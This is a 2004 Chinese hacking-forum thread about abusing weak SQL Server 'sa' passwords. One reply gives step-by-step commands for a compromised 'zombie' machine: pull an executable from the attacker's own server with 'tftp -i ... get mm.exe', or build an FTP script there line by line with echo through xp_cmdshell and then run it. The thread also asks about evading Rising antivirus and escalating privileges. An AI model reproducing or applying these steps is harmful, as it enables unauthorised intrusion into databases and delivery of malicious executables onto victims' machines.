|
 | 作者: naforce [naforce]
 论坛用户 |
登录 |
| 获得了sql的弱口令后,在sqlexec下如何使用ftp或tftp进行文件上传, 格式如何(详细)?能否避开瑞星监视器?那位大虾能指教? |
| 地主 发表时间: 04-02-27 21:00 |
 | 回复: chiru [chiru]  论坛用户 |
登录 |
|
tftp格式相对简单:tftp -i ***.***.***.*** get mm.exe 一般是自己建一个tftp服务器,***.***.***.***指向自己的IP,适合传较小文件。 ftp适合传较大文件 格式如下: ftp -s:ftp.txt . ftp.txt文件内容如下: open ***.***.***.*** 21(也可以是自定义端口) username (依次输入用户名和密码) password binary get mm.exe bye 关键问题是你需要再肉鸡上建立一个ftp.txt文件。有两种方法,1。在本机建好后用tftp传过去。 2。用echo 命令在肉鸡直接建立。 格式如下 : sqlcmd> echo open ***.***.***.*** 21 >>ftp.txt 就向ftp.txt写入了第一行。 能不能被瑞星查杀关键是看你传过去的文件,而不是以上的方法,以上的方法用的都是“正规”的东西。当然,网络防火墙可以限制它的传输。 在使用sql弱口令入侵的时候 ,如果对方限制了xp_cmdshell,那就很麻烦了。 |
| B1层 发表时间: 04-02-28 09:28 |
 | 回复: wlhk456 [wlhk456]  论坛用户 |
登录 |
|
先谢谢楼上的朋友啊,好象不是所以的sa空口令都有一定的权限吧!我 就扫了个sa空口令机子,连一般的命令都不好使!有什么办法提升下权限啊 |
| B2层 发表时间: 04-02-28 16:24 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 关于sa的一个问题